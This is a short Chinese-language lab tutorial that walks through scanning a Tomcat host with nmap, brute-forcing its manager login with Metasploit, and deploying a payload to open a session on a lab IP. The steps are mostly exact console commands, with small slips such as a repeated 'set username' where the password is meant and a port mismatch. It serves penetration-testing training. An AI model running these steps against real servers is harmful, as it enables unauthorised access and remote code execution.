Metasploit爆破Tomcat弱口令

目的

利用Tomcat弱口令漏洞,破解出登陆密码,获得目标主机会话。

原理

利用枚举的方法破解Tomcat的弱口令。

环境

Metasploit爆破Tomcat弱口令_第1张图片
攻击环境

步骤

  1. 使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择“在终端中打开”。
  2. 在终端中输入命令“nmap –sV 192.168.1.3”,对目标主机进行端口扫描,发现开放8081端口并且运行着ApacheTomcat/CoyoteJSP engine1.1。
  3. 在终端中输入命令“msfconsole”,启动MSF终端。
  4. 在终端下输入命令“search tomcat”, 搜索tomcat的相关工具和攻击载荷。
  5. 在终端输入“use auxiliary/scanner/http/tomcat_mgr_login”, 启用漏洞利用模块, 提示符就会提示进入到该路径下。
  6. 在终端下输入“set RHOSTS 192.168.1.3”,设置攻击目标主机IP。
  7. 在终端下输入“set RPORT 8180”,设置攻击目标主机端口号.
  8. 在终端下输入“exploit”, 实施攻击。获得用户名tomcat,密码tomcat。
  9. 在终端下输入“use exploit/multi/http/tomcat_mgr_deploy”, 启用漏洞利用模块, 提示符就会提示进入到该路径下。
  10. 在终端下输入“set RHOST 192.168.1.3”,设置攻击的目标主机IP。
  11. 在终端下输入“set RPORT 8180”,设置攻击的目标主机端口号。
  12. 在终端下输入“set username tomcat”,设置攻击时使用的登录账号tomcat。
  13. 在终端下输入“set username tomcat”,设置攻击时使用的密码tomcat。
  14. 在终端下输入“exploit”,开始攻击,建立会话。
  15. 在终端下输入“getuid”,查看获取的用户权限。

你可能感兴趣的:(Metasploit爆破Tomcat弱口令)